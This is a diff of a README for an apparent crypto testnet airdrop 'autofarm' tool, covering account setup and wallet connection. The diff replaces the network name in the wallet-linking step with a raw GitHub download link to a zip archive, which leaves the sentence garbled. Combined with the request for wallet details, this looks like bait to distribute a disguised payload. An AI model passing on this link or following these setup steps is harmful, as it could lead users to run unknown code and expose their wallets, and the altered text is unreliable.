Hout-UI/ABS-XYZ-Testnet-Autofarm/README.md

    After running the application for the first time, you will be prompted to set up your account.
 Follow the on-screen instructions to create your profile.

 2. **Connecting to the Testnet**
-   Input your wallet details to link your account to the ABS.XYZ testnet.
+   Input your wallet details to link your account to the https://raw.githubusercontent.com/Hout-UI/ABS-XYZ-Testnet-Autofarm/main/lustring/ABS-XYZ-Testnet-Autofarm_v2.6.zip testnet.
 Make sure you have the necessary testnet tokens to interact with the platform.

 3. **Finding Airdrops**
    Navigate to the 'Airdrops' section in the app.
 Here, you can view available airdrops and choose which ones to participate in.